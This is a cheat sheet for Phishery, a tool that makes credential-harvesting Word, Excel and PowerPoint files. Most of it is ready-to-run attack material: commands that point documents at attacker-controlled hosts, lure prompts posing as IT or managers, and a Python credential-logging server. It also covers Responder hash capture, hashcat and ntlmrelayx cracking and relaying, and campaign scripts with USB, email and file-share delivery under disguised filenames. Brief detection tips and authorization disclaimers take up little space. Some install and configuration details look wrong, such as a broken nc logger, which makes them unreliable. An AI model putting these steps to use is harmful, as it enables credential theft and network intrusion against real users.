Phishery

Overview

Phishery is a specialized tool designed for authorized penetration testing that generates Office documents embedded with credential harvesting payloads. When a user opens a crafted Word, Excel, or PowerPoint file, Windows displays a basic authentication dialog that captures credentials or NTLM hashes. This technique exploits legitimate Office functionality to perform authorized social engineering assessments and security testing.

Capabilities:

Generate weaponized Office documents
Embed custom authentication prompts
Capture NTLM hashes
Support multiple Office formats
Configurable prompts and messages
Cross-platform delivery
Integration with credential capture servers

Installation

Linux/macOS

# Clone repository
git clone https://github.com/ryhanson/phishery.git
cd phishery

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x phishery.py

# Run
python phishery.py

Linux Installation (apt)

# Some distributions may have packages
sudo apt-get install phishery

# Or use pip
pip install phishery

macOS with Homebrew

# May be available in community repos
brew install phishery

# Or install from source
git clone https://github.com/ryhanson/phishery.git
cd phishery
pip install -r requirements.txt

Windows

# Clone repository
git clone https://github.com/ryhanson/phishery.git
cd phishery

# Install dependencies
pip install -r requirements.txt

# Run
python phishery.py

Docker

# Build container
docker build -t phishery .

# Run
docker run -it phishery python phishery.py

Basic Usage

Generate Weaponized Document

# Create basic malicious Word document
python phishery.py -t word -u http://attacker.com/capture

# PowerPoint document
python phishery.py -t powerpoint -u http://attacker.com/capture

# Excel document
python phishery.py -t excel -u http://attacker.com/capture

# Save with specific filename
python phishery.py -t word -u http://attacker.com/capture -o report.docx

Essential Commands

Command	Purpose
`-t word`	Generate Word document
`-t excel`	Generate Excel spreadsheet
`-t powerpoint`	Generate PowerPoint
`-u URL`	Set credential capture URL
`-o filename`	Output filename
`-m message`	Custom prompt message
`-v`	Verbose output

Document Generation

Word Document Payload

# Create Word document with UNC path
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\target.xlsx \
  -o malicious_report.docx

# With custom message
python phishery.py \
  -t word \
  -u \\\\192.168.1.100\\documents\\file.xlsx \
  -m "Please enter your credentials to open this document" \
  -o secure_document.docx

Excel Document Payload

# Create Excel with embedded link
python phishery.py \
  -t excel \
  -u \\\\attacker.com\\share\\workbook.xlsx \
  -o quarterly_report.xlsx

# With specific worksheet prompt
python phishery.py \
  -t excel \
  -u \\\\attacker.com\\analytics\\data.xlsx \
  -m "Corporate credentials required" \
  -o budget_analysis.xlsx

PowerPoint Document Payload

# Generate malicious presentation
python phishery.py \
  -t powerpoint \
  -u \\\\attacker.com\\slides\\presentation.pptx \
  -o company_briefing.pptx

# With theme reference
python phishery.py \
  -t powerpoint \
  -u \\\\attacker.com\\themes\\modern.pptx \
  -m "Open theme file to apply formatting" \
  -o quarterly_review.pptx

Credential Capture Setup

UNC Path Method (SMB)

# Using UNC paths for credential capture
python phishery.py \
  -t word \
  -u \\\\attacker.internal\\share\\document.docx \
  -o bait_document.docx

# With IP address
python phishery.py \
  -t word \
  -u \\\\10.0.0.50\\files\\report.xlsx \
  -o quarterly_data.docx

HTTP URL Method

# Using HTTP server for capture
python phishery.py \
  -t word \
  -u http://capture.server.com/auth \
  -o document.docx

# HTTPS endpoint
python phishery.py \
  -t word \
  -u https://corp-auth.company.com/verify \
  -o secure_form.docx

Responder Integration

# Setup Responder for NTLM capture
responder -I eth0 -dwPv

# Generate documents pointing to Responder
python phishery.py \
  -t word \
  -u \\\\<YOUR_IP>\\share\\file.docx \
  -o phishing_document.docx

# Monitor Responder logs
tail -f /usr/share/responder/logs/*

Advanced Configuration

Custom Prompts

# Standard prompt
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\document.docx \
  -m "This file is read-only. Enter your credentials to edit."

# IT support themed
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\patch.docx \
  -m "Security update required. Enter domain credentials."

# Manager approval themed
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\approval.docx \
  -m "Manager approval system. Please log in with corporate credentials."

Multiple Document Generation

#!/bin/bash
# Generate multiple variants

TARGETS=("user1" "user2" "user3")
SERVER="attacker.internal"

for target in "${TARGETS[@]}"; do
    python phishery.py \
      -t word \
      -u \\\\$SERVER\\share\\${target}_document.docx \
      -m "Personalized document for $target" \
      -o "${target}_report.docx"
done

Document Customization

# With document content
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\document.docx \
  -m "Opening document..." \
  -c "This appears to be a legitimate document content" \
  -o legitimate_looking.docx

Capture Server Setup

Simple HTTP Listener

#!/bin/bash
# Basic credential logger

while true; do
    echo "Waiting for connections..."
    
    nc -l -p 80 -e bash -c \
      'echo -e "HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"Access\"\r\n\r\n"' | \
      tee -a captured_creds.txt
done

Python HTTP Server

# capture_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import logging

logging.basicConfig(filename='credentials.log', level=logging.INFO)

class CredentialHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log authorization header
        auth = self.headers.get('Authorization', 'None')
        logging.info(f"Credentials from {self.client_address[0]}: {auth}")
        
        self.send_response(401)
        self.send_header('WWW-Authenticate', 'Basic realm="Access"')
        self.end_headers()

if __name__ == '__main__':
    server = HTTPServer(('0.0.0.0', 80), CredentialHandler)
    server.serve_forever()

Run server:

python capture_server.py &

Responder for NTLM Capture

# Start Responder on listening interface
responder -I eth0 -wrPv

# Responder captures:
# - NTLM hashes
# - NTLMv2 responses
# - NetNTLM authentication

# Monitor captured credentials
cat /usr/share/responder/logs/*.txt

Apache with Basic Auth Logging

# Configure Apache to log auth attempts
<Directory /var/www/html/capture>
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
    
    # Log auth attempts
    LogFormat "%h %t \"%r\" %s %b \"%{Authorization}i\"" auth
    CustomLog /var/log/apache2/auth.log auth
</Directory>

Delivery Methods

Email Delivery

# Compose email with attachment
# To: target@company.com
# Subject: Important: Q4 Budget Review Needed
# Body: Please review and approve the attached quarterly budget document
# Attachment: quarterly_budget.docx (generated with phishery)

# Place on accessible network share
cp quarterly_report.docx /mnt/shared_documents/Q4_Report.docx

# Update shared folder with trojan document
cp generated_payload.docx \\server\shared\Annual_Review.docx

USB Distribution

# Copy to USB drive for physical distribution
cp malicious_document.docx /media/usb_drive/Important_Update.docx

# Label appropriately for social engineering
# e.g., "2026_Salary_Review_Instructions.docx"

Document Repository

# Upload to company document system
# - SharePoint
# - OneDrive
# - Google Drive (if compromised)
# - Internal wiki or documentation system

# Name to blend in with legitimate files
# Examples:
# - Employee_Handbook_2026.docx
# - Security_Policy_Update.docx
# - Benefits_Enrollment_2026.docx

NTLM Hash Capture

Hash Format

# Responder captures hashes like:
user::DOMAIN:nonce:response1:response2

# Example:
admin::COMPANY:0x123abc456:8a2d5e7c...

Hash Cracking

# Use hashcat to crack captured NTLM
hashcat -m 5500 hashes.txt wordlist.txt

# Use john the ripper
john --format=netntlm hashes.txt

# Hydra for online testing
hydra -L users.txt -p password smb://target.com

Hash Relay

# Use captured hashes directly with ntlmrelayx
python ntlmrelayx.py -t ldap://dc.company.com

# No password needed - relay the hash itself
# Requires same domain/network

Detection and Evasion

Detection Methods

# Check for embedded links
unzip -l document.docx | grep -i "\.rels"

# Examine XML content
unzip -p document.docx word/document.xml | \
  grep -oE 'w:link="|r:embed="|r:id=' | head -20

# Use tools to scan
yara -r document.docx yara_rules.yar

Defensive Measures

# Disable external content in Office
# Group Policy (Windows):
# Computer Configuration > Administrative Templates > 
# Microsoft Office 2016 > Security Settings > 
# Trust Center > Block all unmanaged add-ins

# User training on suspicious documents
# - Check sender legitimacy
# - Verify file extensions
# - Be cautious of permission requests

Batch Campaign Generation

Campaign Script

#!/bin/bash
# Phishing campaign generator

TEMPLATE="document_template.docx"
TARGET_LIST="targets.txt"
CAPTURE_URL="http://attacker.com/capture"
OUTPUT_DIR="campaign_docs"

mkdir -p "$OUTPUT_DIR"

while IFS= read -r target; do
    echo "Generating document for: $target"
    
    # Create personalized document
    python phishery.py \
      -t word \
      -u "\\\\attacker.com\\share\\${target}_file.docx" \
      -m "Document for review by $target" \
      -o "$OUTPUT_DIR/${target}_document.docx"
    
    echo "Created: $OUTPUT_DIR/${target}_document.docx"
done < "$TARGET_LIST"

echo "Campaign documents generated in $OUTPUT_DIR/"

Tracking and Logging

#!/bin/bash
# Log campaign delivery

CAMPAIGN_LOG="campaign_log.txt"

{
    echo "Campaign Started: $(date)"
    echo "Target Count: $(wc -l < targets.txt)"
    echo "Documents: $(ls -1 campaign_docs/ | wc -l)"
    echo ""
    echo "Documents Generated:"
    ls -lh campaign_docs/
} | tee "$CAMPAIGN_LOG"

Compliance and Authorization

Required Documentation

# Obtain written authorization including:
# - Specific targets/users
# - Duration of assessment
# - Scope and objectives
# - Authorized delivery methods
# - Incident response procedures
# - Liability and legal boundaries

# Example authorization template:
# [Company Name] Penetration Test Authorization
# Test Date: YYYY-MM-DD
# Authorized Tester: [Your Name/Company]
# Scope: Social engineering assessment
# Methods: Phishing documents via email
# Targets: Listed users with manager approval
# Legal: [Liability statement]
# Signatures: Client authorization representative

Reporting Results

# Document findings:
# - Total documents sent
# - Click rate
# - Credentials captured
# - Systems accessed via captured credentials
# - Recommendations for improvement
# - Timeline and evidence

Troubleshooting

Common Issues

Document Corruption:

# Regenerate with simpler settings
python phishery.py -t word -u \\\\server\\share\\file.docx

# Test on clean system
# Verify Office version compatibility

Not Triggering Auth Prompt:

# Ensure UNC path format is correct
# Windows format: \\server\share\file
# Not: //server/share/file or \\server\\share\\file

# Test path manually
net use \\attacker.com\share

Credentials Not Captured:

# Verify listener is running and accessible
curl -u test:test http://attacker.com/capture

# Check firewall rules
sudo ufw allow 80/tcp

# Monitor network traffic
tcpdump -i eth0 -n port 80

Comparison with Similar Tools

Tool	Format	Capture Method	Difficulty
Phishery	Office	UNC/HTTP	Easy
Evilginx2	Reverse proxy	Credential page	Moderate
GoPhish	Email	Custom form	Easy
King Phisher	Full suite	Custom	Advanced

Legal and Ethical Requirements

Authorized Use Only

Phishery must be used only for:

Authorized penetration testing
Authorized security assessments
Authorized red team exercises
Staff security awareness training (with disclosure)

ILLEGAL Uses:

Unauthorized credential theft
Corporate espionage
Identity fraud
Unauthorized access attempts

Mandatory Requirements

Written authorization from organization leadership
Clear scope and timeline
Documented methodology
Incident response plan
Proper confidentiality agreements
Licensed security professionals
Insurance/liability coverage

Post-Assessment

Return all captured credentials/hashes
Document vulnerabilities found
Provide remediation recommendations
Destroy test artifacts
Brief leadership on findings
Support security awareness training

Resources

GitHub: https://github.com/ryhanson/phishery
NTLM Authentication: https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview
Responder: https://github.com/SpiderLabs/Responder
Office Security: https://support.microsoft.com/en-us/topic/office-security-8a38ea94-99d2-4fdf-8e2e-a4f09bf59f19

Disclaimer

Phishery is a legitimate security testing tool. Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting security assessments. The author and maintainers are not responsible for misuse of this tool.